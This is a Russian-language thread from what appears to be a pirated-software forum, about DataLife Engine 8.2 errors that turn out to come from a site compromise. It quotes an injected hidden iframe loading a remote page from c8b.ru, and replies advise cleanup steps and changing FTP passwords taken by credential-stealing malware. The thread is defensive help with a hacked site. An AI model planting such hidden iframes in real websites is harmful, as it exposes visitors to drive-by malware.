• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Информация DataLife Engine 8.2

Статус
В этой теме нельзя размещать новые ответы.
Объясните пожалуйста почему мне постоянно выдаёт ошибки?
PHP:
Parse error: syntax error, unexpected T_STRING in /sata1/home/users/****/www/www.*****.com.ua/index.php on line 221

Parse error: syntax error, unexpected $end in /sata1/home/users/****/www/www.****.com.ua/engine/skins/default.skin.php on line 451
И как их можно исправить?!
Заранее спасибо.
Раньше таких проблем у меня не было:(
 
Demon425 вот красава) мне б такую базу собрать!!! и сколько времени сайту?
 
SeoN.
1) Выложи 221 строку index.php и 451 default.skin.php
2) Если изменения в этих файлах не производились - замени на файлы из архива.

P.s. хоре флудить про базы и обсуждать красоту БД...
 
SeoN.
1) Выложи 221 строку index.php и 451 default.skin.php
2) Если изменения в этих файлах не производились - замени на файлы из архива.
Изначально строки 221 в index.php и 451 default.skin.php были пустые!
После того как мне выбило ошибку я посмотрел эти строки, и что я там увидил
В index.php
PHP:
<iframe src="http://c8b.ru:8080/index.php" width=173 height=117 style="visibility: hidden"></iframe>
В default.skin.php
PHP:
<script language="javascript" type="text/javascript">
<!--
function getClientWidth()
{
  return document.compatMode=='CSS1Compat' && !window.opera?document.documentElement.clientWidth:document.body.clientWidth;
}
var main_body_size = getClientWidth();

if (main_body_size > 1300) document.getElementById('main_body').style.width = "1200px";

//-->
</script>

Как это там появилось, я не знаю(
 
SeoN
Если сайт в сети, то тебя взломали, если локально юзаеш то нулл у тебя черезжопный )))
Сносить это, а еще лучше замени файлы дистрибутива чтоб с гарантией не оставить подобных примочек и будет тебе счастье.
 
обычное дело, поднималось не раз - код копируется в шаблон по умлочанию, сам в свое время попал на такое. Самое интересное что сайты на вп, зебре не тронуло, только ДЛЕ. Удаляй вредоносный код, и меняй пароли к фтп, которые ты с 95 % вероятности СОХРАНЯЛ в программе файлзилла, тоталкомандер или любом другом популярном файл менеждере (последний пинч пиздит даже с куте фтп, который ранее был безопасным). Ну и стандартную процедуру лечения вирей на компе, установку фаервола тоже проделать не помешает
 
Поставь права 444 на эти 2 файла. У самого такое было, это походу какая-то эпидемия.
P.S. Если не можешь эти права поставить через ftp, юзай панель для этого, DA, Cpanel и т.д.
 
a perexod s versi 7 delo gimoroynoye?
Смотря сколько наворотов у тебя стоит.
Просто все модули и хаки придется ставить заново.

А сам "голый" апгрейд не геморен.

Добавлено через 7 минут
Demon425 вот красава) мне б такую базу собрать!!! и сколько времени сайту?

Сайту где-то 2,5 - 3 года. Классно раскрутили. Столько посещалки...И комментов дофига и сами юзеры новости закидывают очень много (еще бы - депозитчики так зарабатывают, с такой то посещалкой).
И ДЛЕ (и заодно их сервер)все это выдерживает успешно) Хотя, конечно, не так быстро, как хотелось бы.
 
Нашел еще один баг. Сайты с большими базами страдаются от долго кеширование. Файл слишком долго создается. Не понятно че случилось. В старых версия норм.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху